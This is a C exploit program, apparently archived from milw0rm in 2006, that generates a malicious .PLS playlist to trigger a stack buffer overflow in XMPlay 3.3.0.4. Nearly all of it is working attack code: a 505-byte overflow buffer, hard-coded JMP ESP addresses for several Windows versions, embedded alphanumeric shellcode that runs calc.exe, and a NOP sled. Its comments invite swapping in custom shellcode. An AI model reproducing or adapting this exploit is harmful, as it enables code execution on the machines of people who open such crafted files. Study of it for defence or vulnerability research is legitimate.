149 lines
No EOL
4 KiB
C
149 lines
No EOL
4 KiB
C
/*
|
|
===================================================================
|
|
0-day XMPlay 3.3.0.4 .PLS Filename Buffer Overflow Exploit
|
|
===================================================================
|
|
XMPlay 3.3.0.4 and lower experiance a stack-based buffer overflow when
|
|
loading malformed M3U and PLS files (probably ASX files as well -
|
|
working on the ASX Exploit as we speak).
|
|
|
|
This merely executes CALC.exe but you could always add your own custom
|
|
shellcode (alpha2)
|
|
|
|
===============
|
|
PLS Format
|
|
[playlist]
|
|
File1=C:\[BUFFER][JMP][SHELLCODE][NOPSLED][Extension]
|
|
Title1=title (could also be used for the buffer overflow exploit)
|
|
|
|
ESP Stores Address of Shellcode
|
|
|
|
|
|
Huge Greets and Thanks to Expanders (expanders[at]gmail[dot]com)
|
|
Who I presented the PoC and Discovery to for the original M3U exploit
|
|
He wrote the first PoC Exploit for it.
|
|
|
|
And Jerome Athias for some neat tools. Both of these
|
|
guys are very talented, keep up the good work.
|
|
|
|
Reported Exploit Date: 11/21/2006
|
|
|
|
*/
|
|
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
int main(int argc, char *argv[])
|
|
{
|
|
|
|
FILE *Exploit;
|
|
char buffer[512];
|
|
char *outp;
|
|
|
|
/* Executes Calc.exe Alpha2 Shellcode Provided by Expanders <expanders[at]gmail[dot]com> */
|
|
unsigned char scode[] =
|
|
"TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
|
|
"YlHhQTs0s0c0LKcuwLLK1ls52Xs1JONkRofxNkcoUpUQZKCylK4tLKuQxnTqo0LYnLMTkpptUWiQ9ZdM"
|
|
"5QO2JKZT5k2tUtUTPuKULKQOfDc1zKPfNkflrkNkSowlvaZKLK5LlKgqxkMYqL14wtYSFQkpcTNkQPtp"
|
|
"LEiPd8VlNkqPVllKPp7lNMLK0htHjKuYnkMPnP7pc05PLKsXUlsovQxvU0PVOy9hlCo0SKRpsXhoxNip"
|
|
"sPu8LX9nMZvnv79oM7sSU1rLsSdnu5rX3UuPA";
|
|
|
|
|
|
|
|
char NOPSled[50];
|
|
char tail[] = ".mid\r\n";
|
|
int JMP, x;
|
|
|
|
printf("\n======================================================================\n");
|
|
printf("XMPlay 3.3.0.4 and prior PLS Filename Buffer Overflow Exploit\n");
|
|
printf("Discovered and Coded By: Greg Linares <GLinares.code[at]gmail[dot]com>\n");
|
|
printf("Usage: %s <output PLS file> <JMP> [Exploit Display Name] \n", argv[0]);
|
|
printf("\n JMP Options\n");
|
|
printf("1 = English Windows XP SP 2 User32.dll <JMP ESP 0x77db41bc>\n");
|
|
printf("2 = English Windows XP SP 1 User32.dll <JMP ESP 0x77d718fc>\n");
|
|
printf("3 = English Windows 2003 SP0 and SP1 User32.dll <JMP ESP 0x77d74adc>\n");
|
|
printf("4 = English Windows 2000 SP 4 User32.dll <JMP ESP 0x77e3c256>\n");
|
|
printf("====================================================================\n\n\n");
|
|
|
|
|
|
if (argc < 2) {
|
|
printf("Invalid Number Of Arguments\n");
|
|
return 1;
|
|
}
|
|
|
|
|
|
Exploit = fopen(argv[1],"w");
|
|
if ( !Exploit )
|
|
{
|
|
printf("\nCouldn't Open File!");
|
|
return 1;
|
|
}
|
|
|
|
memset(buffer, 0, 505);
|
|
memset(NOPSled, 0, 20);
|
|
|
|
|
|
fputs("[playlist]\r\n", Exploit);
|
|
fputs("File1=", Exploit);
|
|
fputs("C:\\", Exploit);
|
|
|
|
for (x=0;x<505;x++) {
|
|
strcat(buffer, "A");
|
|
}
|
|
|
|
fputs(buffer, Exploit);
|
|
if (atoi(argv[2]) <= 0) {
|
|
JMP = 1;
|
|
} else if (atoi(argv[2]) > 4) {
|
|
JMP = 1;
|
|
} else {
|
|
JMP = atoi(argv[2]);
|
|
}
|
|
switch(JMP) {
|
|
case 1:
|
|
printf("Using English Windows XP SP2 JMP...\n");
|
|
fputs("\xbc\x41\xdb\x77", Exploit);
|
|
break;
|
|
case 2:
|
|
printf("Using English Windows XP SP1 JMP...\n");
|
|
fputs("\xfc\x18\xd7\x77", Exploit);
|
|
break;
|
|
case 3:
|
|
printf("Using English Windows 2003 SP0 & SP1 JMP...\n");
|
|
fputs("\xdc\x4a\xd7\x77", Exploit);
|
|
break;
|
|
case 4:
|
|
printf("Using English Windows 2000 SP 4 JMP...\n");
|
|
fputs("\x56\xc2\xe3\x77", Exploit);
|
|
break;
|
|
}
|
|
|
|
fputs(scode, Exploit);
|
|
|
|
for (x=0;x<20;x++) {
|
|
strcat(NOPSled, "\x90");
|
|
}
|
|
|
|
fputs(NOPSled, Exploit);
|
|
fputs(tail, Exploit);
|
|
if (strlen(argv[4]) > 0) {
|
|
fputs("Title1=", Exploit);
|
|
fputs(argv[4], Exploit);
|
|
fputs("\r\n", Exploit);
|
|
} else {
|
|
fputs("Title1=XMPlay_0-Day_PLS_Buffer_Overflow_Exploit_By_Greg_Linares\r\n", Exploit);
|
|
}
|
|
|
|
fputs("Length1=512", Exploit);
|
|
|
|
printf("Exploit Succeeded...\n Output File: %s\n\n", argv[1]);
|
|
|
|
|
|
printf("Exploit Coded by Greg Linares (GLinares.code[at]gmail[dot]com)\n");
|
|
printf("Greetz to: Jerome Athias and Expanders - Thanks For The Ideas, Tools and Alpha2 Shell Code\n");
|
|
|
|
fclose(Exploit);
|
|
return 0;
|
|
}
|
|
|
|
// milw0rm.com [2006-11-21]
|